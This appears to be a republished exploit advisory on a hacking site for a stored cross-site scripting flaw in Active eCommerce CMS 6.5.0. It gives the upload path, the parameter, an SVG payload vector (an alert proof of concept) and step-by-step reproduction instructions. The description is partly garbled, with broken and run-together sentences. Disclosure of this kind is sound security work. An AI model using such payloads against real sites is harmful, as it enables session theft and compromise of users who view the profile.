![Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]](https://www.ineedhack.com/wp-content/uploads/2023/01/Course-content-16-360x180.png)
# Exploit Title: Active eCommerce CMS 6.5.0 – ‘svg’ Stored Cross-Site
Scripting (XSS).
# Date: 19/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: ActiveITzone
# Vendor Homepage: https://activeitzone.com/
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405
# Version: 6.5.0
# Tested on: Live ( Centos & Litespeed Web Server)
# Demo Link : https://demo.activeitzone.com/ecommerce/
# Description
Active eCommerce CMS 6.5.0 has a security vulnerability
Profile picture upload allows you to store cross-site scripting
(XSS) attacks. The vulnerability is in how you handle
Images called “svg”, which may contain malicious code, can be saved as files. An attacker can
This vulnerability can be exploited by uploading an image with special “svg”,
File as a profile photo, which is then executed by the application
When the user sees the profile. The attacker can steal from the profile.
To protect sensitive information such as passwords or other data,
The user can commit malicious acts. This vulnerability highlights
Web site validation is crucial. Image file handling in web applications is also critical.
application development.
# Exploit Details #
# Vulnerable Path : /aiz-uploader/upload
# Parameter: files (POST)
# Vector: <svg version="1.1" baseProfile="full" xmlns="
http://www.w3.org/2000/svg”>
<rect width="300" height="100"
style=”fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)” />
alert(“haha XSS”);
# Proof of Concept (PoC), Exploit
1) Goto: https://localhost
2) Register by clicking here
2) Login to Your Account
Go Manage Your Profile
5) Upload Given Vector to anyname.svg
anyname.svg file)
6) Click on Upload to see Your Profile Picture
7) XSS Popup will be fired
# Image PoC: Refer Image
1) Payload Fired: https://prnt.sc/cW0F_BtpyMcv
